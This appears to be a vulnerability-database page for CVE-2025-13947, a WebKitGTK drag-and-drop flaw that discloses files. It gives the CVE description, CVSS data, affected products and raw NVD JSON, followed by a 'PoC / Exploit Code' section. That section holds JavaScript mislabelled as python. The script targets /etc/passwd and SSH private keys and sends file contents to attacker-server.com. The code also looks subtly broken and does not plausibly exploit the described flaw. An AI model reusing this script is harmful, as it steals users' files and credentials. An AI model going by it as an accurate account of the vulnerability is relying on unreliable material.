Security Vulnerability Report
中文
CVE-2025-13947 CVSS 7.4 HIGH

CVE-2025-13947

Published: 2025-12-03 10:15:48
Last Modified: 2026-04-20 13:16:10
Source: [email protected]

Description

A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read via abusing the file drag-and-drop mechanism where WebKitGTK does not verify that drag operations originate from outside the browser.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebKitGTK < 2.44.0
Fedora 39-40
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 7 (不受影响)
Red Hat Enterprise Linux 6 (不受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13947 PoC - WebKitGTK File Drag-and-Drop Information Disclosure // This PoC demonstrates how to exploit the file drag-and-drop mechanism const maliciousPoc = { // Create a fake file drag operation createFakeDropEvent: function(filePath) { // Create a DataTransfer object const dataTransfer = new DataTransfer(); // Create a fake File object with arbitrary file path const file = new File(['dummy'], filePath.split('/').pop(), { type: 'text/plain' }); // Add file to DataTransfer dataTransfer.items.add(file); // Create and dispatch dragover event (required for drop) const dragoverEvent = new DragEvent('dragover', { bubbles: true, cancelable: true, dataTransfer: dataTransfer }); document.dispatchEvent(dragoverEvent); // Create and dispatch drop event const dropEvent = new DragEvent('drop', { bubbles: true, cancelable: true, dataTransfer: dataTransfer }); document.dispatchEvent(dropEvent); }, // Read file content via input element readFileViaInput: function(filePath) { const input = document.createElement('input'); input.type = 'file'; // Attempt to set the file value (limited by browser security) // In vulnerable WebKitGTK, combined with drag-drop, this can be exploited // Create drop zone to capture file const dropZone = document.createElement('div'); dropZone.style.cssText = 'width:200px;height:200px;border:2px dashed #000;'; dropZone.textContent = 'Drop file here'; dropZone.addEventListener('drop', async (e) => { e.preventDefault(); e.stopPropagation(); // In vulnerable WebKitGTK, files can be read without proper validation for (const file of e.dataTransfer.files) { const content = await file.text(); console.log('File content:', content); // Exfiltrate content to attacker server this.exfiltrate(file.name, content); } }); document.body.appendChild(dropZone); }, // Exfiltrate data to attacker controlled server exfiltrate: function(filename, content) { fetch('https://attacker-server.com/exfil', { method: 'POST', body: JSON.stringify({filename, content}), mode: 'no-cors' }); }, // Main exploitation function exploit: function() { // Target files to read const targetFiles = [ '/etc/passwd', '/home/user/.ssh/id_rsa', '/home/user/.bashrc', '/home/user/.config/sensitive.conf' ]; targetFiles.forEach(file => { this.createFakeDropEvent(file); }); } }; // Execute exploitation maliciousPoc.exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13947", "sourceIdentifier": "[email protected]", "published": "2025-12-03T10:15:47.710", "lastModified": "2026-04-20T13:16:10.257", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read via abusing the file drag-and-drop mechanism where WebKitGTK does not verify that drag operations originate from outside the browser."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:22789", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22790", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23110", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23433", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23434", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23451", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23452", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23583", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23591", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23742", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23743", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-13947", "source": "[email protected]"}, {"url": "https://bugs.webkit.org/show_bug.cgi?id=271957", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418576", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.